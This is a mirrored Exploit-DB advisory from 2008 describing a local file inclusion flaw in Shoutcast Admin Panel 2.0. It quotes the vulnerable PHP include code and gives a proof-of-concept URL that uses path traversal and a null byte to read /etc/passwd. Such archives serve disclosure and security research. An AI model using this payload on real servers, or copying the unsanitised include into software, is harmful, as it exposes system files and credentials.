bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/5813.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

63 lines
No EOL
1.6 KiB
Text
Raw Blame History

============================================================
Shoutcast Admin Panel 2.0 Local File Inclusion Vulnerability
============================================================
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
AUTHOR : CWH Underground
DATE : 14 June 2008
SITE : www.citec.us
#####################################################
APPLICATION : WallCity-Server: Shoutcast Admin Panel
VERSION : 2.0
DOWNLOAD : http://downloads.sourceforge.net/shoutcastadmin
#####################################################
---LFI---
-------------------------
Vulnerable in index.php
-------------------------
@Line
79: if (isset($_GET['page']))
80: $page = $_GET['page'];
81: else
82: $page = "main";
.
.
.
204: <?PHP if(!include("pages/".$page.".php"))
205: {
206: table("Achtung!");
207: echo "Die Seite existiert nicht!";
208: closetable();
209: }
210: ?>
-------------
POC Exploit
-------------
[+] http://192.168.24.25/wallcity/index.php?page=../../../../../../etc/passwd%00
##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos #
##################################################################
# milw0rm.com [2008-06-14]
Reference in a new issue View git blame Copy permalink